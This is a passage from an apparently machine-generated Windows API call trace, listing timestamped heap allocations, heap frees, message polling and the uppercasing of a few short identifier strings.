| out: hHeap=0x2af0000) returned 1 [0218.828] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0f8 | out: hHeap=0x2af0000) returned 1 [0218.828] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab038 | out: hHeap=0x2af0000) returned 1 [0218.828] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f70c0 | out: hHeap=0x2af0000) returned 1 [0218.829] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72218 | out: hHeap=0x2af0000) returned 1 [0218.829] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72388 | out: hHeap=0x2af0000) returned 1 [0218.829] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae70 [0218.829] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab038 [0218.829] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72328 [0218.829] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab128 | out: hHeap=0x2af0000) returned 1 [0218.829] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaafa8 | out: hHeap=0x2af0000) returned 1 [0218.829] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf90 | out: hHeap=0x2af0000) returned 1 [0218.829] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72318 | out: hHeap=0x2af0000) returned 1 [0218.829] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab068 | out: hHeap=0x2af0000) returned 1 [0218.829] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72368 | out: hHeap=0x2af0000) returned 1 [0218.829] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae58 | out: hHeap=0x2af0000) returned 1 [0218.829] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf90 [0218.829] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae70 | out: hHeap=0x2af0000) returned 1 [0218.829] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0218.829] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72298 [0218.829] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaafa8 [0218.829] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab068 [0218.829] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72318 [0218.829] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0f8 [0218.829] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72318 | out: hHeap=0x2af0000) returned 1 [0218.829] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72368 [0218.829] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722b8 [0218.829] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0f8 | out: hHeap=0x2af0000) returned 1 [0218.829] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72368 | out: hHeap=0x2af0000) returned 1 [0218.829] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722b8 | out: hHeap=0x2af0000) returned 1 [0218.830] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab068 | out: hHeap=0x2af0000) returned 1 [0218.830] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaafa8 | out: hHeap=0x2af0000) returned 1 [0218.830] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72298 | out: hHeap=0x2af0000) returned 1 [0218.830] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0218.830] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722b8 [0218.830] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721b8 [0218.830] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7100 [0218.830] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7100 | out: hHeap=0x2af0000) returned 1 [0218.830] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721b8 | out: hHeap=0x2af0000) returned 1 [0218.830] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722b8 | out: hHeap=0x2af0000) returned 1 [0218.830] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e980 [0218.830] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0218.830] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721b8 [0218.830] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77fd0 [0218.830] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72218 [0218.830] CharUpperBuffW (in: lpsz="A2600502813", cchLength=0xb | out: lpsz="A2600502813") returned 0xb [0218.830] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77fd0 | out: hHeap=0x2af0000) returned 1 [0218.830] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72218 | out: hHeap=0x2af0000) returned 1 [0218.830] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0f8 [0218.830] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72368 [0218.830] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab068 [0218.830] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab128 [0218.830] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72298 [0218.830] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaafa8 [0218.831] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72298 | out: hHeap=0x2af0000) returned 1 [0218.831] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72218 [0218.831] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae58 [0218.831] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72318 [0218.831] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72318 | out: hHeap=0x2af0000) returned 1 [0218.831] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72268 [0218.831] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae70 [0218.831] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72298 [0218.831] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72298 | out: hHeap=0x2af0000) returned 1 [0218.831] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72318 [0218.831] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab338 [0218.831] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72228 [0218.831] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72228 | out: hHeap=0x2af0000) returned 1 [0218.831] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab218 [0218.831] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78138 [0218.831] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab6f8 [0218.831] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72298 [0218.832] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6f8 | out: hHeap=0x2af0000) returned 1 [0218.832] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78318 [0218.832] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab6f8 [0218.832] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab530 [0218.832] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a783e0 [0218.832] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab710 [0218.832] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a722b8 [0218.832] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab710 | out: hHeap=0x2af0000) returned 1 [0218.832] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f80 [0218.832] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab710 [0218.832] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77fa8 [0218.832] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab548 [0218.832] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a722a8 [0218.832] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab548 | out: hHeap=0x2af0000) returned 1 [0218.832] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78368 [0218.832] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab440 [0218.832] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78430 [0218.832] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab500 [0218.832] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72388 [0218.832] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab500 | out: hHeap=0x2af0000) returned 1 [0218.832] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78408 [0218.832] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab500 [0218.832] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5de88 [0218.832] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0218.833] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72228 [0218.833] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a724f8 [0218.833] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab578 [0218.833] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab548 [0218.833] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72508 [0218.833] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab9e0 [0218.833] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72508 | out: hHeap=0x2af0000) returned 1 [0218.833] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72508 [0218.833] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77ff8 [0218.833] CharUpperBuffW (in: lpsz="SSA2600502813", cchLength=0xd | out: lpsz="SSA2600502813") returned 0xd [0218.833] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77ff8 | out: hHeap=0x2af0000) returned 1 [0218.833] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72508 | out: hHeap=0x2af0000) returned 1 [0218.833] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab9e0 | out: hHeap=0x2af0000) returned 1 [0218.833] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab548 | out: hHeap=0x2af0000) returned 1 [0218.833] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab578 | out: hHeap=0x2af0000) returned 1 [0218.833] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a724f8 | out: hHeap=0x2af0000) returned 1 [0218.833] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72228 | out: hHeap=0x2af0000) returned 1 [0218.833] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e8c0 [0218.833] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0218.833] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e8c0 | out: hHeap=0x2af0000) returned 1 [0218.833] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0218.833] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab548 [0218.833] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72228 [0218.833] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab548 | out: hHeap=0x2af0000) returned 1 [0218.833] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78020 [0218.834] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab548 [0218.834] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab578 [0218.834] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a724f8 [0218.834] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78160 [0218.834] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab8a8 [0218.834] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72508 [0218.834] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab8a8 | out: hHeap=0x2af0000) returned 1 [0218.834] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78098 [0218.834] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab7b8 [0218.834] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab7a0 [0218.834] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78020 | out: hHeap=0x2af0000) returned 1 [0218.834] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72228 | out: hHeap=0x2af0000) returned 1 [0218.834] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab548 | out: hHeap=0x2af0000) returned 1 [0218.834] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0218.834] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab548 [0218.834] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72228 [0218.834] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab548 | out: hHeap=0x2af0000) returned 1 [0218.834] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78200 [0218.834] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab548 [0218.834] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab8a8 [0218.834] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72558 [0218.834] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a782a0 [0218.834] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab9e0 [0218.834] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72528 [0218.834] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab9e0 | out: hHeap=0x2af0000) returned 1 [0218.835] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77fd0 [0218.835] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab830 [0218.835] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab968 [0218.835] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78200 | out: hHeap=0x2af0000) returned 1 [0218.835] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72228 | out: hHeap=0x2af0000) returned 1 [0218.835] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab548 | out: hHeap=0x2af0000) returned 1 [0218.835] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0218.835] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab548 [0218.835] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72228 [0218.835] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab548 | out: hHeap=0x2af0000) returned 1 [0218.835] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a780c0 [0218.835] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab548 [0218.835] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab7d0 [0218.835] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72548 [0218.835] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78458 [0218.835] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab8f0 [0218.835] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72578 [0218.835] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab8f0 | out: hHeap=0x2af0000) returned 1 [0218.835] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a783b8 [0218.835] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab8d8 [0218.835] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaba28 [0218.835] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a780c0 | out: hHeap=0x2af0000) returned 1 [0218.835] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72228 | out: hHeap=0x2af0000) returned 1 [0218.835] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab548 | out: hHeap=0x2af0000) returned 1 [0218.835] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0218.835] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab548 [0218.835] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72228 [0218.836] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab548 | out: hHeap=0x2af0000) returned 1 [0218.836] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78110 [0218.836] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab548 [0218.836] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaba10 [0218.836] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72698 [0218.836] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78188 [0218.836] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab9b0 [0218.836] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a726a8 [0218.836] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab9b0 | out: hHeap=0x2af0000) returned 1 [0218.836] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77ff8 [0218.836] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab950 [0218.836] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab800 [0218.836] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78110 | out: hHeap=0x2af0000) returned 1 [0218.836] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72228 | out: hHeap=0x2af0000) returned 1 [0218.836] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab548 | out: hHeap=0x2af0000) returned 1 [0218.836] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0218.836] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab548 [0218.836] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72228 [0218.836] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab548 | out: hHeap=0x2af0000) returned 1 [0218.836] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78278 [0218.836] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab548 [0218.836] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab998 [0218.836] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72628 [0218.836] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a780e8 [0218.836] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab920 [0218.836] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72778 [0218.837] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab920 | out: hHeap=0x2af0000) returned 1 [0218.837] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a782f0 [0218.837] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab848 [0218.837] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab7e8 [0218.837] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78278 | out: hHeap=0x2af0000) returned 1 [0218.837] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72228 | out: hHeap=0x2af0000) returned 1 [0218.837] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab548 | out: hHeap=0x2af0000) returned 1 [0218.837] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0218.837] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78200 [0218.837] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72228 [0218.837] CharUpperBuffW (in: lpsz="A1100103809", cchLength=0xb | out: lpsz="A1100103809") returned 0xb [0218.837] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78200 | out: hHeap=0x2af0000) returned 1 [0218.837] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72228 | out: hHeap=0x2af0000) returned 1 [0218.837] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab548 [0218.837] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5dfa8 [0218.837] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0218.837] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72228 [0218.837] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72708 [0218.837] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab740 [0218.837] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab818 [0218.837] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72718 [0218.837] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab758 [0218.837] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72718 | out: hHeap=0x2af0000) returned 1 [0218.837] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72648 [0218.837] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78020 [0218.837] CharUpperBuffW (in: lpsz="SSA1100103809", cchLength=0xd | out: lpsz="SSA1100103809") returned 0xd [0218.837] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78020 | out: hHeap=0x2af0000) returned 1 [0218.838] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72648 | out: hHeap=0x2af0000) returned 1 [0218.838] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab758 | out: hHeap=0x2af0000) returned 1 [0218.838] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab818 | out: hHeap=0x2af0000) returned 1 [0218.838] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab740 | out: hHeap=0x2af0000) returned 1 [0218.838] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72708 | out: hHeap=0x2af0000) returned 1 [0218.838] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72228 | out: hHeap=0x2af0000) returned 1 [0218.838] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ed80 [0218.838] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0218.838] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ed80 | out: hHeap=0x2af0000) returned 1 [0218.838] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0218.838] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72228 [0218.838] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78200 [0218.838] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 